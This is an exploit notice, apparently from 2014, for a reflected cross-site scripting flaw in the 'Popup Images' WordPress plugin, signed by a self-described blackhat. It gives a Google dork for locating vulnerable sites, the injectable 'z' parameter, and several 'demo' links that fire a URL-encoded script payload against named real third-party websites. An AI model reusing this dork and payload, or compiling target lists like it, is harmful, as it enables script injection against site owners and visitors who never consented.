[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress Plugin Popup Images Cross Site Scripting
[+]
[+] Exploit Author: Milad Hacking
[+]
[+] Date: 2014-06-1
[+]
[+] Google Dork : inurl:/wp-content/plugins/popup-images
[+]
[+] Vendor Homepage : http://www.Wordpress.org
[+]
[+] Tested on: Windows 7 , Mozilla FireFox
[+]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Location :
[localhost]/wp-content/plugins/popup-images/popup.php?z=[XSS]

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Demo :

http://www.kornels-welt.de/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20LOL/%29;%3C/script%3E

http://www.lions-borsdorf-parthenaue.de/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://thefilmlot.com/tflblogwp/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.tsocktsarina.com/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://sinkarto.hu/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.lions-borsdorf-parthenaue.de/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.tomasvasquez.com.br/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.tomasvasquez.com.br/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.tomasvasquez.com.br/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E


[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Discovered By : Milad Hacking

We Love Mohammad

Mail : milad.hacking.blackhat@gmail.com

Home Page : https://www.facebook.com/milad.hacking.5

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]